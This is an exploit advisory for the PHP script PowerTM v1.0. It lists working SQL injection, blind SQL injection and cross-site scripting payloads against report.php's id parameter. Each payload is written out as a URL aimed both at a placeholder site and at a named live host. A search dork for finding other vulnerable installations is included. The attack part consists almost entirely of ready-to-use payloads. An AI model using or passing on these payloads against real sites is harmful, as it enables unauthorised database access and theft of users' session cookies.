PowerTM version 1.0 suffers from remote SQL injection and cross site scripting vulnerabilities.
cf9d8aa96b9dee35f949deadafdd0f12129a470db3d5d28fa16abf040af5c175
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] PowerTM v1.0 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ PowerTM v1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.powerwd.net/ ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Content Copyright © 2007 RadNics Gold ]
[»] Dork2: [ OFF ]
[»] Price: [ FREE ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/report.php?id=[SQL]
[»] http://powertm.powerwd.net/report.php?id=null+union+select+1,version(),3,4,5,6,7,8,9--
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[»] http://www.site.com/patch/report.php?id=[BLIND]
[»] http://powertm.powerwd.net/report.php?id=1%20and%201=null+union+select+1,version(),3,4,5,6,7,8,9--
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/report.php?id=[XSS]
[»] http://powertm.powerwd.net/report.php?id=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Author: Moudi
###########################################################################